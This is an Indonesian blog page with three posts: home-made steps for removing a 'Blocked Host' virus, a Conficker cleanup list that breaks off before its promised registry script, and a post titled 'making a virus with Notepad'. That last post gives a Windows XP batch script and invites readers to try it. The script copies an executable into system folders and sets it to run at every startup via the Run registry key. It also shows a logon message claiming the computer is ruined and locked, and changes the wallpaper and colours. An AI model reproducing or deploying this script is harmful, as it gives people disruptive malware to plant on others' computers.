Berbagi Di Sini !

Senin, 05 April 2010

Cara menghapus virus Blocked Host

Virus blocked Host, ciri-ciri komputer yang terserang virus ini, terdapat file host pada windows/system32/driver /etc/host dengan ukuran kira 4 kb, koneksi internet lelet banget apalagi komp yg di pake untuk jaringan,system restore gak aktif di disable oleh group polic , scand pake smadav terdapat 1 virus dan 126 file registry yg terinveksi (tapi smadav gak bisa menhapusnya) saat itu saya menggunakan smadav versi terbaru yaitu 7.5. kemaren komputerku terserang virus ini, pusing memang 2 hari utak utik gak kelar-kelar juga, cari di google banyak saran,

- saran pertama Pake Smadav terbaru saat itu smadav versi terbaru adalah versi 7.5
Hasilnya = smadav hanya bisa mendeteksi tapi begitu kita fixall (hapus) dalam
beberapa detik balik lagi file hosts dan registry yg terinfeksi

- saran kedua di pake norman malware cleaner.exe atau pasang Antivirus Norman +
update terbarunya
Hasilnya = Tetap gak mempan juga, dan file hosts pada windows/system32/driver
/etc/host sama sekali tidak di anggap virus.

- Saran ketiga di suruh pake Antivirus Avira + update terbaru
Hasilnya = agak lumayan pada file-file yang terinfeksi firus pada drive system
volume information dapat terdeteksi tapi file virus pada windows/system32/driver
/etc/host tidak di anggap virus dan begitu komputer di restat malah Aviranya
jadi disable dan gakmau di enabel kan (status unknow, dan virusnya balik lagi deh).

Akhirnya dengan banyak berdoa berhasil juga, caranya
1. Instal Antivirus AVG free 9.o silahkan unduh disini gratis kok
2. Update Antivirusnya secara online klo gak bisa ya secara offline bisa di download
gratis cari aja di google atau biasanya dah di sedikan dalam paket CD tabloid PC
MILD
3. biasanya setelah selesai instalasi AVG (sebelum di update) file hosts di
windows/system32/driver/etc/host udah bisa terbaca tapi belum bisa terhapus dan
pesan peringatan muncul terus meskipun kita dah pilih heal tetep aja .. hal ini
cukup mengganggu cara mengatasinya copy file protocol pada windows/system32
/driver /etc/host dan pastekan di situ juga ntar dia jadi copy of protokol,
kemudian file virus yaitu hosts yang berukuran kira 4 kb an kita hapus dan segera
kita rename file copy of protokol tadi menjadi hosts kemudian klik kanan pada
file tsb pilih properties conteng read only kemudian enter. hal ini harus
berlangsung cepat. dijamin tuh virus gak pesan peringatan gak ganggu2 lg.
4. Setelah AVG selesai di update scant kompi semua drive karena di drive yg lain
(biasanya drive D) juga terinfeksi virus klo di komp saya alamatanya di system
volume information trus restat pasti tuh virus pada
kabur (untuk mengetesnya jalankan smadav kemudian klik fixall untuk mengembalikan
registry yang terinfeksi) biarkan beberapa saat, jalan kan smadav lg akan muncul
pesan TIDAK ADA VIRUS TERDETEKSI.

Selasa, 30 Maret 2010

Seven Ways to Eliminate Viruses 'Confecker'

Bagi yang sedang mencari tips atau mencari artikel cara menghilangkan virus ‘Conficker’ mungkin artikel ini perlu di simak. seperti kita ketahui, ‘Conficker.DV’ menggunakan metode penyebaran yang berbeda dari pendahulunya. Dengan canggihnya, virus tersebut berusaha mengakses jaringan menggunakan celah windows ‘Default Share’ (ADMIN$\system32) dengan menebak password administrator.

Selain itu ‘Conficker.DV’ juga membuat file pada media removable seperti flashdisk, harddisk dan card reader dengan menyimpan file hidden pada root drive.

Sementara aksi yang sama seperti pendahulunya, yaitu berusaha mengexploitasi MS08-067 atau celah keamanan Windows, Windows Server Service atau SVCHOST.exe. Banyak user yang terinfeksi dikarenakan tidak mengaktifkan fitur Automatic Updates dan tidak melakukan patch windows MS08-067.

Jika sudah begini, simak 7 tips singkatanalis virus dari Vaksincom untuk membasmi virus ‘Conficker.DV’ yang diterima detikINET, Rabu (28/1/2009):

1. Putuskan komputer yang akan dibersihkan dari jaringan/internet.
2. Matikan system restore (Windows XP/Vista).
3. Matikan proses virus yang aktif pada services. Gunakan removal tool dari Norman untuk membersihkan virus yang aktif. Jika belum memiliki, bisa didownload di situs norman.
4. Delete service svchost.exe gadungan yang ditanamkan virus pada registry. Anda dapat mencari secara manual pada registry.
5. Hapus Schedule Task yang dibuat oleh virus. (C:\WINDOWS\Tasks)
6. Hapus string registry yang dibuat oleh virus. Untuk mempermudah dapat menggunakan script registry di bawah ini:

Membuat Virus Dengan Notepad

Ni saya dapet dari hasil baca-baca “HELP”-nya windows Xp…trus saya modif sendiri…
note: “HANYA BEKERJA PADA WINDOWS XP”

selamat mencoba mungkin anda tertarik dengan permainan saya

- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

Next home